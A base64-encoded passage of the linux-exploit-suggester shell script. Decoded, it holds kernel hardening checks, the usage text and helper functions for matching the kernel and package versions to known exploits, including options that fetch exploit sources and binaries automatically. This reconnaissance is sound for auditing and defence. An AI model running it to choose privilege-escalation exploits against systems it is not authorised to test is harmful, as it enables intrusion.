T15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvaW9fc3RyaWN0X2Rldm1lbS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogSGFyZHdhcmUtYmFzZWQgcHJvdGVjdGlvbiBmZWF0dXJlczoKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN1cGVydmlzb3IgTW9kZSBFeGVjdXRpb24gUHJvdGVjdGlvbiAoU01FUCkgc3VwcG9ydAphdmFpbGFibGU6IHZlcj49My4wCmVuYWJsZWQ6IGNtZDpncmVwIC1xaSBzbWVwIC9wcm9jL2NwdWluZm8KYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zbWVwLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTdXBlcnZpc29yIE1vZGUgQWNjZXNzIFByZXZlbnRpb24gKFNNQVApIHN1cHBvcnQKYXZhaWxhYmxlOiB2ZXI+PTMuNwplbmFibGVkOiBjbWQ6Z3JlcCAtcWkgc21hcCAvcHJvYy9jcHVpbmZvCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc21hcC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogM3JkIHBhcnR5IGtlcm5lbCBwcm90ZWN0aW9uIG1lY2hhbmlzbXM6CkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBHcnNlY3VyaXR5CmF2YWlsYWJsZTogQ09ORklHX0dSS0VSTlNFQz15CmVuYWJsZWQ6IGNtZDp0ZXN0IC1jIC9kZXYvZ3JzZWMKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFBhWAphdmFpbGFibGU6IENPTkZJR19QQVg9eQplbmFibGVkOiBjbWQ6dGVzdCAteCAvc2Jpbi9wYXhjdGwKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IExpbnV4IEtlcm5lbCBSdW50aW1lIEd1YXJkIChMS1JHKSBrZXJuZWwgbW9kdWxlCmVuYWJsZWQ6IGNtZDp0ZXN0IC1kIC9wcm9jL3N5cy9sa3JnCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvbGtyZy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogQXR0YWNrIFN1cmZhY2U6CkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBVc2VyIG5hbWVzcGFjZXMgZm9yIHVucHJpdmlsZWdlZCBhY2NvdW50cwphdmFpbGFibGU6IENPTkZJR19VU0VSX05TPXkKZW5hYmxlZDogc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvdXNlcl9ucy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogVW5wcml2aWxlZ2VkIGFjY2VzcyB0byBicGYoKSBzeXN0ZW0gY2FsbAphdmFpbGFibGU6IENPTkZJR19CUEZfU1lTQ0FMTD15CmVuYWJsZWQ6IHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX2JwZl9kaXNhYmxlZCE9MQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2JwZl9zeXNjYWxsLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTeXNjYWxscyBmaWx0ZXJpbmcKYXZhaWxhYmxlOiBDT05GSUdfU0VDQ09NUD15CmVuYWJsZWQ6IGNtZDpncmVwIC1pIFNlY2NvbXAgL3Byb2Mvc2VsZi9zdGF0dXMgfCBhd2sgJ3twcmludCBcJDJ9JwphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2JwZl9zeXNjYWxsLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTdXBwb3J0IGZvciAvZGV2L21lbSBhY2Nlc3MKYXZhaWxhYmxlOiBDT05GSUdfREVWTUVNPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZXZtZW0ubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN1cHBvcnQgZm9yIC9kZXYva21lbSBhY2Nlc3MKYXZhaWxhYmxlOiBDT05GSUdfREVWS01FTT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGV2a21lbS5tZApFT0YKKQoKCnZlcnNpb24oKSB7CiAgICBlY2hvICJsaW51eC1leHBsb2l0LXN1Z2dlc3RlciAiJFZFUlNJT04iLCBtemV0LCBodHRwczovL3otbGFicy5ldSwgTWFyY2ggMjAxOSIKfQoKdXNhZ2UoKSB7CiAgICBlY2hvICJMRVMgdmVyLiAkVkVSU0lPTiAoaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyKSBieSBAX216ZXRfIgogICAgZWNobwogICAgZWNobyAiVXNhZ2U6IGxpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyLnNoIFtPUFRJT05TXSIKICAgIGVjaG8KICAgIGVjaG8gIiAtViB8IC0tdmVyc2lvbiAgICAgICAgICAgICAgIC0gcHJpbnQgdmVyc2lvbiBvZiB0aGlzIHNjcmlwdCIKICAgIGVjaG8gIiAtaCB8IC0taGVscCAgICAgICAgICAgICAgICAgIC0gcHJpbnQgdGhpcyBoZWxwIgogICAgZWNobyAiIC1rIHwgLS1rZXJuZWwgPHZlcnNpb24+ICAgICAgLSBwcm92aWRlIGtlcm5lbCB2ZXJzaW9uIgogICAgZWNobyAiIC11IHwgLS11bmFtZSA8c3RyaW5nPiAgICAgICAgLSBwcm92aWRlICd1bmFtZSAtYScgc3RyaW5nIgogICAgZWNobyAiIC0tc2tpcC1tb3JlLWNoZWNrcyAgICAgICAgICAgLSBkbyBub3QgcGVyZm9ybSBhZGRpdGlvbmFsIGNoZWNrcyAoa2VybmVsIGNvbmZpZywgc3lzY3RsKSB0byBkZXRlcm1pbmUgaWYgZXhwbG9pdCBpcyBhcHBsaWNhYmxlIgogICAgZWNobyAiIC0tc2tpcC1wa2ctdmVyc2lvbnMgICAgICAgICAgLSBza2lwIGNoZWNraW5nIGZvciBleGFjdCB1c2Vyc3BhY2UgcGFja2FnZSB2ZXJzaW9uIChoZWxwcyB0byBhdm9pZCBmYWxzZSBuZWdhdGl2ZXMpIgogICAgZWNobyAiIC1wIHwgLS1wa2dsaXN0LWZpbGUgPGZpbGU+ICAgLSBwcm92aWRlIGZpbGUgd2l0aCAnZHBrZyAtbCcgb3IgJ3JwbSAtcWEnIGNvbW1hbmQgb3V0cHV0IgogICAgZWNobyAiIC0tY3ZlbGlzdC1maWxlIDxmaWxlPiAgICAgICAgLSBwcm92aWRlIGZpbGUgd2l0aCBMaW51eCBrZXJuZWwgQ1ZFcyBsaXN0IgogICAgZWNobyAiIC0tY2hlY2tzZWMgICAgICAgICAgICAgICAgICAgLSBsaXN0IHNlY3VyaXR5IHJlbGF0ZWQgZmVhdHVyZXMgZm9yIHlvdXIgSFcva2VybmVsIgogICAgZWNobyAiIC1zIHwgLS1mZXRjaC1zb3VyY2VzICAgICAgICAgLSBhdXRvbWF0aWNhbGx5IGRvd25sb2FkcyBzb3VyY2UgZm9yIG1hdGNoZWQgZXhwbG9pdCIKICAgIGVjaG8gIiAtYiB8IC0tZmV0Y2gtYmluYXJpZXMgICAgICAgIC0gYXV0b21hdGljYWxseSBkb3dubG9hZHMgYmluYXJ5IGZvciBtYXRjaGVkIGV4cGxvaXQgaWYgYXZhaWxhYmxlIgogICAgZWNobyAiIC1mIHwgLS1mdWxsICAgICAgICAgICAgICAgICAgLSBzaG93IGZ1bGwgaW5mbyBhYm91dCBtYXRjaGVkIGV4cGxvaXQiCiAgICBlY2hvICIgLWcgfCAtLXNob3J0ICAgICAgICAgICAgICAgICAtIHNob3cgc2hvcnRlbiBpbmZvIGFib3V0IG1hdGNoZWQgZXhwbG9pdCIKICAgIGVjaG8gIiAtLWtlcm5lbHNwYWNlLW9ubHkgICAgICAgICAgIC0gc2hvdyBvbmx5IGtlcm5lbCB2dWxuZXJhYmlsaXRpZXMiCiAgICBlY2hvICIgLS11c2Vyc3BhY2Utb25seSAgICAgICAgICAgICAtIHNob3cgb25seSB1c2Vyc3BhY2UgdnVsbmVyYWJpbGl0aWVzIgogICAgZWNobyAiIC1kIHwgLS1zaG93LWRvcyAgICAgICAgICAgICAgLSBzaG93IGFsc28gRG9TZXMgaW4gcmVzdWx0cyIKfQoKZXhpdFdpdGhFcnJNc2coKSB7CiAgICBlY2hvICIkMSIgMT4mMgogICAgZXhpdCAxCn0KCiMgZXh0cmFjdHMgYWxsIGluZm9ybWF0aW9uIGZyb20gb3V0cHV0IG9mICd1bmFtZSAtYScgY29tbWFuZApwYXJzZVVuYW1lKCkgewogICAgbG9jYWwgdW5hbWU9JDEKCiAgICBLRVJORUw9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJDN9JyB8IGN1dCAtZCAnLScgLWYgMSkKICAgIEtFUk5FTF9BTEw9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJDN9JykKICAgIEFSQ0g9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJChORi0xKX0nKQoKICAgIE9TPSIiCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAnZGViJyAmJiBPUz0iZGViaWFuIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ3VidW50dScgJiYgT1M9InVidW50dSIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLUFSQ0gnICYmIE9TPSJhcmNoIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wtZGVlcGluJyAmJiBPUz0iZGVlcGluIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wtTUFOSkFSTycgJiYgT1M9Im1hbmphcm8iCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAnXC5mYycgJiYgT1M9ImZlZG9yYSIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLmVsJyAmJiBPUz0iUkhFTCIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLm1nYScgJiYgT1M9Im1hZ2VpYSIKCiAgICAjICd1bmFtZSAtYScgb3V0cHV0IGRvZXNuJ3QgY29udGFpbiBkaXN0cmlidXRpb24gbnVtYmVyIChhdCBsZWFzdCBub3QgaW4gY2FzZSBvZiBhbGwgZGlzdHJvcykKfQoKZ2V0UGtnTGlzdCgpIHsKICAgIGxvY2FsIGRpc3Rybz0kMQogICAgbG9jYWwgcGtnbGlzdF9maWxlPSQyCiAgICAKICAgICMgdGFrZSBwYWNrYWdlIGxpc3RpbmcgZnJvbSBwcm92aWRlZCBmaWxlICYgZGV0ZWN0IGlmIGl0J3MgJ3JwbSAtcWEnIGxpc3Rpbmcgb3IgJ2Rwa2cgLWwnIG9yICdwYWNtYW4gLVEnIGxpc3Rpbmcgb2Ygbm90IHJlY29nbml6ZWQgbGlzdGluZwogICAgaWYgWyAiJG9wdF9wa2dsaXN0X2ZpbGUiID0gInRydWUiIC1hIC1lICIkcGtnbGlzdF9maWxlIiBdOyB0aGVuCgogICAgICAgICMgdWJ1bnR1L2RlYmlhbiBwYWNrYWdlIGxpc3RpbmcgZmlsZQogICAgICAgIGlmIFsgJChoZWFkIC0xICIkcGtnbGlzdF9maWxlIiB8IGdyZXAgJ0Rlc2lyZWQ9VW5rbm93bi9JbnN0YWxsL1JlbW92ZS9QdXJnZS9Ib2xkJykgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIgfCBhd2sgJ3twcmludCAkMiItIiQzfScgfCBzZWQgJ3MvOmFtZDY0Ly9nJykKCiAgICAgICAgICAgIE9TPSJkZWJpYW4iCiAgICAgICAgICAgIFsgIiQoZ3JlcCB1YnVudHUgIiRwa2dsaXN0X2ZpbGUiKSIgXSAmJiBPUz0idWJ1bnR1IgogICAgICAgICMgcmVkaGF0IHBhY2thZ2UgbGlzdGluZyBmaWxlCiAgICAgICAgZWxpZiBbICIkKGdyZXAgLUUgJ1wuZWxbMS05XStbXC5fXScgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiKQogICAgICAgICAgICBPUz0iUkhFTCIKICAgICAgICAjIGZlZG9yYSBwYWNrYWdlIGxpc3RpbmcgZmlsZQogICAgICAgIGVsaWYgWyAiJChncmVwIC1FICdcLmZjWzEtOV0rJ2kgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiKQogICAgICAgICAgICBPUz0iZmVkb3JhIgogICAgICAgICMgbWFnZWlhIHBhY2thZ2UgbGlzdGluZyBmaWxlCiAgICAgICAgZWxpZiBbICIkKGdyZXAgLUUgJ1wubWdhWzEtOV0rJyAiJHBrZ2xpc3RfZmlsZSIgfCBoZWFkIC0xKSIgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIpCiAgICAgICAgICAgIE9TPSJtYWdlaWEiCiAgICAgICAgIyBwYWNtYW4gcGFja2FnZSBsaXN0aW5nIGZpbGUKICAgICAgICBlbGlmIFsgIiQoZ3JlcCAtRSAnXCBbMC05XStcLicgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiIHwgYXdrICd7cHJpbnQgJDEiLSIkMn0nKQogICAgICAgICAgICBPUz0iYXJjaCIKICAgICAgICAjIGZpbGUgbm90IHJlY29nbml6ZWQgLSBza2lwcGluZwogICAgICAgIGVsc2UKICAgICAgICAgICAgUEtHX0xJU1Q9IiIKICAgICAgICBmaQoKICAgIGVsaWYgWyAiJGRpc3RybyIgPSAiZGViaWFuIiAtbyAiJGRpc3RybyIgPSAidWJ1bnR1IiAtbyAiJGRpc3RybyIgPSAiZGVlcGluIiBdOyB0aGVuCiAgICAgICAgUEtHX0xJU1Q9JChkcGtnIC1sIHwgYXdrICd7cHJpbnQgJDIiLSIkM30nIHwgc2VkICdzLzphbWQ2NC8vZycpCiAgICBlbGlmIFsgIiRkaXN0cm8iID0gIlJIRUwiIC1vICIkZGlzdHJvIiA9ICJmZWRvcmEiIC1vICIkZGlzdHJvIiA9ICJtYWdlaWEiIF07IHRoZW4KICAgICAgICBQS0dfTElTVD0kKHJwbSAtcWEpCiAgICBlbGlmIFsgIiRkaXN0cm8iID0gImFyY2giIC1vICIkZGlzdHJvIiA9ICJtYW5qYXJvIiBdOyB0aGVuCiAgICAgICAgUEtHX0xJU1Q9JChwYWNtYW4gLVEgfCBhd2sgJ3twcmludCAkMSItIiQyfScpCiAgICBlbGlmIFsgLXggL3Vzci9iaW4vZXF1ZXJ5IF07IHRoZW4KICAgICAgICBQS0dfTElTVD0kKC91c3IvYmluL2VxdWVyeSAtLXF1aWV0IGxpc3QgJyonIC1GICckbmFtZTokdmVyc2lvbicgfCBjdXQgLWQvIC1mMi0gfCBhd2sgJ3twcmludCAkMSI6IiQyfScpCiAgICBlbHNlCiAgICAgICAgIyBwYWNrYWdlcyBsaXN0aW5nIG5vdCBhdmFpbGFibGUKICAgICAgICBQS0dfTElTVD0iIgogICAgZmkKfQoKIyBmcm9tOiBodHRwczovL3N0YWNrb3ZlcmZsb3cuY29tL3F1ZXN0aW9ucy80MDIzODMwL2hvdy1jb21wYXJlLXR3by1zdHJpbmdzLWluLWRvdC1zZXBhcmF0ZWQtdmVyc2lvbi1mb3JtYXQtaW4tYmFzaAp2ZXJDb21wYXJpc2lvbigpIHsKCiAgICBpZiBbWyAkMSA9PSAkMiBdXQogICAgdGhlbgogICAgICAgIHJldHVybiAwCiAgICBmaQoKICAgIGxvY2FsIElGUz0uCiAgICBsb2NhbCBpIHZlcjE9KCQxKSB2ZXIyPSgkMikKCiAgICAjIGZpbGwgZW1wdHkgZmllbGRzIGluIHZlcjEgd2l0aCB6ZXJvcwogICAgZm9yICgoaT0keyN2ZXIxW0BdfTsgaTwkeyN2ZXIyW0BdfTsgaSsrKSkKICAgIGRvCiAgICAgICAgdmVyMVtpXT0wCiAgICBkb25lCgogICAgZm9yICgoaT0wOyBpPCR7I3ZlcjFbQF19OyBpKyspKQogICAgZG8KICAgICAgICBpZiBbWyAteiAke3ZlcjJbaV19IF1dCiAgICAgICAgdGhlbgogICAgICAgICAgICAjIGZpbGwgZW1wdHkgZmllbGRzIGluIHZlcjIgd2l0aCB6ZXJvcwogICAgICAgICAgICB2ZXIyW2ldPTAKICAgICAgICBmaQogICAgICAgIGlmICgoMTAjJHt2ZXIxW2ldfSA+IDEwIyR7dmVyMltpXX0pKQogICAgICAgIHRoZW4KICAgICAgICAgICAgcmV0dXJuIDEKICAgICAgICBmaQogICAgICAgIGlmICgoMTAjJHt2ZXIxW2ldfSA8IDEwIyR7dmVyMltpXX0pKQogICAgICAgIHRoZW4KICAgICAgICAgICAgcmV0dXJuIDIKICAgICAgICBmaQogICAgZG9uZQoKICAgIHJldHVybiAwCn0KCmRvVmVyc2lvbkNvbXBhcmlzaW9uKCkgewogICAgbG9jYWwgcmVxVmVyc2lvbj0iJDEiCiAgICBsb2NhbCByZXFSZWxhdGlvbj0iJDIiCiAgICBsb2NhbCBjdXJyZW50VmVyc2lvbj0iJDMiCgogICAgdmVyQ29tcGFyaXNpb24gJGN1cnJlbnRWZXJzaW9uICRyZXFWZXJzaW9uCiAgICBjYXNlICQ/IGluCiAgICAgICAgMCkgY3VycmVudFJlbGF0aW9uPSc9Jzs7CiAgICAgICAgMSkgY3VycmVudFJlbGF0aW9uPSc+Jzs7CiAgICAgICAgMikgY3VycmVudFJlbGF0aW9uPSc8Jzs7CiAgICBlc2FjCgogICAgaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPSIgXTsgdGhlbgogICAgICAgIFsgJGN1cnJlbnRSZWxhdGlvbiA9PSAiPSIgXSAmJiByZXR1cm4gMAogICAgZWxpZiBbICIkcmVxUmVsYXRpb24iID09ICI+IiBdOyB0aGVuCiAgICAgICAgWyAkY3VycmVudFJlbGF0aW9uID09ICI+IiBdICYmIHJldHVybiAwCiAgICBlbGlmIFsgIiRyZXFSZWxhdGlvbiIgPT0gIjwiIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIjwiIF0gJiYgcmV0dXJuIDAKICAgIGVsaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPj0iIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj0iIF0gJiYgcmV0dXJuIDAKICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj4iIF0gJiYgcmV0dXJuIDAKICAgIGVsaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPD0iIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj0iIF0gJiYgcmV0dXJuIDAKICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIjwiIF0gJiYgcmV0dXJuIDAKICAgIGZpCn0KCmNvbXBhcmVWYWx1ZXMoKSB7CiAgICBjdXJWYWw9JDEKICAgIHZhbD0kMgogICAgc2lnbj0kMwoKICAgIGlmIFsgIiRzaWduIiA9PSAiPT0iIF07IHRoZW4KICAgICAgICBbICIkdmFsIiA9PSAiJGN1clZhbCIgXSAmJiByZXR1cm4gMAogICAgZWxpZiBbICIkc2lnbiIgPT0gIiE9IiBdOyB0aGVuCiAgICAgICAgWyAiJHZhbCIgIT0gIiRjdXJWYWwiIF0gJiYgcmV0dXJuIDAKICAgIGZpCgogICAgcmV0dXJuIDEKfQoKY2hlY2tSZXF1aXJlbWVudCgpIHsKICAgICNlY2hvICJDaGVja2luZyByZXF1aXJlbWVudDogJDEiCiAgICBsb2NhbCBJTj0iJDEiCiAgICBsb2NhbCBwa2dOYW1lPSIkezI6NH0iCgogICAgaWYgW1sgIiRJTiIgPX4gXnBrZz0uKiQgXV07IHRoZW4KCiAgICAgICAgIyBhbHdheXMgdHJ1ZSBmb3IgTGludXggT1MKICAgICAgICBbICR7cGtnTmFtZX0gPT0gImxpbnV4LWtlcm5lbCIgXSAmJiByZXR1cm4gMAoKICAgICAgICAjIHZlcmlmeSBpZiBwYWNrYWdlIGlzIHByZXNlbnQgCiAgICAgICAgcGtnPSQoZWNobyAiJFBLR19MSVNUIiB8IGdyZXAgLUUgLWkgIl4kcGtnTmFtZS1bMC05XSsiIHwgaGVhZCAtMSkKICAgICAgICBpZiBbIC1uICIkcGtnIiBdOyB0aGVuCiAgICAgICAgICAgIHJldHVybiAwCiAgICAgICAgZmkKCiAgICBlbGlmIFtbICIkSU4iID1+IF52ZXIuKiQgXV07IHRoZW4KICAgICAgICB2ZXJzaW9uPSIke0lOLy9bXjAtOS5dL30iCiAgICAgICAgcmVzdD0iJHtJTiN2ZXJ9IgogICAgICAgIG9wZXJhdG9yPSR7cmVzdCUkdmVyc2lvbn0KCiAgICAgICAgaWYgWyAiJHBrZ05hbWUiID09ICJsaW51eC1rZXJuZWwiIC1vICIkb3B0X2NoZWNrc2VjX21vZGUiID09ICJ0cnVlIiBdOyB0aGVuCgogICAgICAgICAgICAjIGZvciAtLWN2ZWxpc3QtZmlsZSBtb2RlIHNraXAga2VybmVsIHZlcnNpb24gY29tcGFyaXNpb24KICAgICAgICAgICAgWyAiJG9wdF9jdmVsaXN0X2ZpbGUiID0gInRydWUiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgICAgIGRvVmVyc2lvbkNvbXBhcmlzaW9uICR2ZXJzaW9uICRvcGVyYXRvciAkS0VSTkVMICYmIHJldHVybiAwCiAgICAgICAgZWxzZQogICAgICAgICAgICAjIGV4dHJhY3QgcGFja2FnZSB2ZXJzaW9uIGFuZCBjaGVjayBpZiByZXF1aXJlbW50IGlzIHRydWUKICAgICAgICAgICAgcGtnPSQoZWNobyAiJFBLR19MSVNUIiB8IGdyZXAgLUUgLWkgIl4kcGtnTmFtZS1bMC05XSsiIHwgaGVhZCAtMSkKCiAgICAgICAgICAgICMgc2tpcCAoaWYgcnVuIHdpdGggLS1za2lwLXBrZy12ZXJzaW9ucykgdmVyc2lvbiBjaGVja2luZyBpZiBwYWNrYWdlIHdpdGggZ2l2ZW4gbmFtZSBpcyBpbnN0YWxsZWQKICAgICAgICAgICAgWyAiJG9wdF9za2lwX3BrZ192ZXJzaW9ucyIgPSAidHJ1ZSIgLWEgLW4gIiRwa2ciIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgICAgICMgdmVyc2lvbmluZzoKICAgICAgICAgICAgI2VjaG8gInBrZzogJHBrZyIKICAgICAgICAgICAgcGtnVmVyc2lvbj0kKGVjaG8gIiRwa2ciIHwgZ3JlcCAtRSAtaSAtbyAtZSAnLVtcLjAtOVwrOnBdK1stXCtdJyB8IGN1dCAtZCc6JyAtZjIgfCBzZWQgJ3MvW1wrLV0vL2cnIHwgc2VkICdzL3BbMC05XS8vZycpCiAgICAgICAgICAgICNlY2hvICJ2ZXJzaW9uOiAkcGtnVmVyc2lvbiIKICAgICAgICAgICAgI2VjaG8gIm9wZXJhdG9yOiAkb3BlcmF0b3IiCiAgICAgICAgICAgICNlY2hvICJyZXF1aXJlZCB2ZXJzaW9uOiAkdmVyc2lvbiIKICAgICAgICAgICAgI2VjaG8KICAgICAgICAgICAgZG9WZXJzaW9uQ29tcGFyaXNpb24gJHZlcnNpb24gJG9wZXJhdG9yICRwa2dWZXJzaW9uICYmIHJldHVybiAwCiAgICAgICAgZmkKICAgIGVsaWYgW1sgIiRJTiIgPX4gXng4Nl82NCQgXV0gJiYgWyAiJEFSQ0giID09ICJ4ODZfNjQiIC1vICIkQVJDSCIgPT0gIiIgXTsgdGhlbgogICAgICAgIHJldHVybiAwCiAgICBlbGlmIFtbICIkSU4iID1+IF54ODYkIF1dICYmIFsgIiRBUkNIIiA9PSAiaTM4NiIgLW8gIiRBUkNIIiA9PSAiaTY4NiIgLW8gIiRBUkNIIiA9PSAiIiBdOyB0aGVuCiAgICAgICAgcmV0dXJuIDAKICAgIGVsaWYgW1sgIiRJTiIgPX4gXkNPTkZJR18uKiQgXV07IHRoZW4KCiAgICAgICAgIyBza2lwIGlmIGNoZWNrIGlzIG5vdCBhcHBsaWNhYmxlICgtayBvciAtLXVuYW1lIG9yIC1wIHNldCkgb3IgaWYgdXNlciBzYWlkIHNvICgtLXNraXAtbW9yZS1jaGVja3MpCiAgICAgICAgWyAiJG9wdF9za2lwX21vcmVfY2hlY2tzIiA9ICJ0cnVlIiBdICYmIHJldHVybiAwCgogICAgICAgICMgaWYga2VybmVsIGNvbmZpZyBJUyBhdmFpbGFibGU6CiAgICAgICAgaWYgWyAtbiAiJEtDT05GSUciIF07IHRoZW4KICAgICAgICAgICAgaWYgJEtDT05GSUcgfCBncmVwIC1FIC1xaSAkSU47IHRoZW4KICAgICAgICAgICAgICAgIHJldHVybiAwOwogICAgICAgICAgICAjIHJlcXVpcmVkIG9wdGlvbiB3YXNuJ3QgZm91bmQsIGV4cGxvaXQgaXMgbm90IGFwcGxpY2FibGUKICAgICAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgcmV0dXJuIDE7CiAgICAgICAgICAgIGZpCiAgICAgICAgIyBjb25maWcgaXMgbm90IGF2YWlsYWJsZQogICAgICAgIGVsc2UKICAgICAgICAgICAgcmV0dXJuIDA7CiAgICAgICAgZmkKICAgIGVsaWYgW1sgIiRJTiIgPX4gXnN5c2N0bDouKiQgXV07IHRoZW4KCiAgICAgICAgIyBza2lwIGlmIGNoZWNrIGlzIG5vdCBhcHBsaWNhYmxlICgtayBvciAtLXVuYW1lIG9yIC1wIG1vZGVzKSBvciBpZiB1c2VyIHNhaWQgc28gKC0tc2tpcC1tb3JlLWNoZWNrcykKICAgICAgICBbICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gInRydWUiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgc3lzY3RsQ29uZGl0aW9uPSIke0lOOjd9IgoKICAgICAgICAjIGV4dHJhY3Qgc3lzY3RsIGVudHJ5LCByZWxhdGlvbiBzaWduIGFuZCByZXF1aXJlZCB2YWx1ZQogICAgICAgIGlmIGVjaG8gJHN5c2N0bENvbmRpdGlvbiB8IGdyZXAgLXFpICIhPSI7IHRoZW4KICAgICAgICAgICAgc2lnbj0iIT0iCiAgICAgICAgZWxpZiBlY2hvICRzeXNjdGxDb25kaXRpb24gfCBncmVwIC1xaSAiPT0iOyB0aGVuCiAgICAgICAgICAgIHNpZ249Ij09IgogICAgICAgIGVsc2UKICAgICAgICAgICAgZXhpdFdpdGhFcnJNc2cgIldyb25nIHN5c2N0bCBjb25kaXRpb24uIFRoZXJlIGlzIHN5bnRheCBlcnJvciBpbiB5b3VyIGZlYXR1cmVzIERCLiBBYm9ydGluZy4iCiAgICAgICAgZmkKICAgICAgICB2YWw9JChlY2hvICIkc3lzY3RsQ29uZGl0aW9uIiB8IGF3ayAtRiAiJHNpZ24iICd7cHJpbnQgJDJ9JykKICAgICAgICBlbnRyeT0kKGVjaG8gIiRzeXNjdGxDb25kaXRpb24iIHwgYXdrIC1GICIkc2lnbiIgJ3twcmludCAkMX0nKQoKICAgICAgICAjIGdldCBjdXJyZW50IHNldHRpbmcgb2Ygc3lzY3RsIGVudHJ5CiAgICAgICAgY3VyVmFsPSQoL3NiaW4vc3lzY3RsIC1hIDI+IC9kZXYvbnVsbCB8IGdyZXAgIiRlbnRyeSIgfCBhd2sgLUYnPScgJ3twcmludCAkMn0nKQoKICAgICAgICAjIHNwZWNpYWwgY2FzZSBmb3IgLS1jaGVja3NlYyBtb2RlOiByZXR1cm4gMiBpZiB0aGVyZSBpcyBubyBz